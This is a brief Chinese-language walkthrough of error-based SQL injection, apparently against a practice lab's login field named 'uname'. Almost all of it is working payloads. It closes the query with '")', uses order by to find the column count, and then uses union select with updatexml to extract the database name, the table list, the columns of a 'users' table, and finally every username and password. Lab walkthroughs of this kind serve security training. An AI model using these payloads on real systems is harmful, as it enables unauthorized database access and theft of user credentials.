一、判断注入点
二、判断回显字段
uname=123") order by 3#
得到结果回显字段为2,当字段为3是错误
三、获取数据库
uname=123") union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)#
四、获取数据表
uname=123") union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
五、获取字段
这里我就选用users表,如果你们对其他表感兴趣,你们可以自行选择
uname=123") union select 1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#
六、获取username、password
uname=123") union select 1,updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)#